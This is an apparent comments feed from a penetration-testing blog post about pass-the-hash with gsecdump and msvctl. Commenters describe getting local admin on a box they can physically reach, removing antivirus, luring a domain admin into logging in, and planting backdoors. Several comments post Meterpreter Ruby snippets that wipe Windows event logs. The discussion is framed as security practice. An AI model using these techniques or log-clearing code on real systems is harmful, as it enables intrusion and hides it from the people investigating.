tag:blogger.com,1999:blog-8539880144347728238.post8264572095960099385..comments2024-01-24T04:15:08.086-05:00Comments on Carnal0wnage Blog: passing the hash with gsecdump and msvctl (yes more)Unknownnoreply@blogger.comBlogger11125tag:blogger.com,1999:blog-8539880144347728238.post-70413995813064956572010-03-19T13:29:18.851-04:002010-03-19T13:29:18.851-04:00cfelix said...
>@CG: Note quite. For one, wait...cfelix said...<br /><br />>@CG: Note quite. For one, waiting for someone to log in, you'll get a LOCAL user, not necessarily a domain admin. <br /><br />True, but all users startup catches everyone, and there are ways to get an admin to log in.<br /><br />>Second, he'll surely notice this is **not** an XP machine.<br /><br />umm, reboot the box back into windows after you drop the backdoor.<br /><br />>This attack aims to get the domain admin credentials, which is as big a game as you'll get.<br /><br />Agree, but i'll take user access over nothing any day.CGhttps://www.blogger.com/profile/11061967917509053185noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-80504333955613057152010-03-19T10:13:39.160-04:002010-03-19T10:13:39.160-04:00@CG: Note quite. For one, waiting for someone to l...@CG: Note quite. For one, waiting for someone to log in, you'll get a LOCAL user, not necessarily a domain admin. Second, he'll surely notice this is **not** an XP machine. This attack aims to get the domain admin credentials, which is as big a game as you'll get.Unknownhttps://www.blogger.com/profile/08651577203924279630noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-57190127826114338422010-03-19T09:53:39.741-04:002010-03-19T09:53:39.741-04:00or if you have physical access to the box just boo...or if you have physical access to the box just boot to a linux distro and just stick your backdoor on the box and wait for someone to log in....<br /><br />no reason to do a bunch of crazy shit if you already have access.CGhttps://www.blogger.com/profile/11061967917509053185noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-75707929470272540372010-03-19T08:13:02.543-04:002010-03-19T08:13:02.543-04:00Let me fill in some details and add some more ques...Let me fill in some details and add some more questions on passing the hash:<br />1) The first issue is getting in as local admin. In my company the boot order was HD first, but this took 1 minute to bypass by removing the relevant jumper. Next, ophcrack will give you the local admin password, but it does cost some 999$ if this involves non-alphanumeric values. There are other tools to replace the local admin password with your own, basically think of a password, run it through MD5 to produce a hash, then use a LiveCD to replace the relevant SAM hash by your own.<br />So, first step is the easy one.<br />2) Next, you need gsecdump. Well, any antivirus I know kills it as soon as it is seen by Windows. So what do you do? You write it on a read-only media like a CD. Still, I get an 'access denied' message from the AV. So you need to kill AV. Two ways I can think of: Erase the relevant folder via a LiveCD or boot in SafeMode and erase the relevant executables in that folder. I was unable to disable AV otherwise. Next, you need to trick a domain admin into doing a remote access, perhaps asking for help with your printer or something. Assuming this access does take place and the domain admin does not reboot the machine, but logs off, then under Local Computer Policy->Computer Configuration->Windows Settings->Security Settings->Security Options->Interactive Logon: Number of Previous logons to cache(in case domain controller....)<br />you see that the system keeps the last N logons. If N=1, then only the last credentials are kept, i.e. your own, when you log on after the domain admin has logged off. So this attack is not that simple and it looks like it can be prevented with the right configuration, unless I miss something.Unknownhttps://www.blogger.com/profile/08651577203924279630noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-83320753389636251242009-04-21T21:10:00.000-04:002009-04-21T21:10:00.000-04:00you have to actually be sitting on the box to get ...<I>you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. </I>If you are on the network you can run the tool on your own windows box, so <I>your</I> machine impersonates the hashes you copied off the other machine. This means there is no requirement for RDP etc<br /><br /><br />Anonymous Steve!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-24836959502239135832008-11-04T18:14:00.000-05:002008-11-04T18:14:00.000-05:00http://www.carnal0wnage.com/research/clearalllog.r...http://www.carnal0wnage.com/research/clearalllog.rbAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-81503882350406646472008-11-04T15:26:00.000-05:002008-11-04T15:26:00.000-05:00Very good! And I added this:print_line("Clearing t...Very good! And I added this:<BR/><BR/>print_line("Clearing the Security Event Log, it will leave a 517 event!") <BR/>log = client.sys.eventlog.open('security')<BR/>log.clear<BR/>log.close<BR/><BR/>print_line("Clearing the Application Event Log!") <BR/>log = client.sys.eventlog.open('application')<BR/>log.clear<BR/>log.close<BR/><BR/>print_line("Clearing the System Event Log!") <BR/>log = client.sys.eventlog.open('system')<BR/>log.clear<BR/>log.closeAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-86958155963404159782008-11-04T06:32:00.000-05:002008-11-04T06:32:00.000-05:00that works just fine on XP/2003, I havent tested i...that works just fine on XP/2003, I havent tested it on Vista or Server2008.<BR/><BR/>it will leave a 517 though. I had done some research and didnt see a way with the current API to pick specific logs and delete, you'd have to upload a third party tool to do that.CGhttps://www.blogger.com/profile/08725211059186839473noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-47248750122737848812008-11-04T05:14:00.000-05:002008-11-04T05:14:00.000-05:00I see this on ChiCon07_Gates_Metasploit-Day2-FunSt...I see this on ChiCon07_Gates_Metasploit-Day2-FunStuff.pdf, I don't know if it works fine:<BR/><BR/>clearseclog.rb<BR/><BR/>print_<BR/>line("Clearing the Security Event<BR/>Log, it will leave a 517 event\n")<BR/>log = client.sys.eventlog.open('security')<BR/>log.clearAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-14692823953335963972008-11-04T04:45:00.000-05:002008-11-04T04:45:00.000-05:00OT: which is the simplest way to use meterpreter t...OT: which is the simplest way to use meterpreter to clear logs on a windows system? Thank you very muchAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-1173456607786759052008-09-13T15:24:00.000-04:002008-09-13T15:24:00.000-04:00CG you should check out http://hak5.org/forums/ind...CG you should check out http://hak5.org/forums/index.php?showtopic=9742&view=findpost&p=100051<BR/><BR/>Someone found some code that lets you access files through the windows permission structure (getting the same without admin) I haven't test this code out, so use with caution.mubixhttps://www.blogger.com/profile/08706151795678283675noreply@blogger.com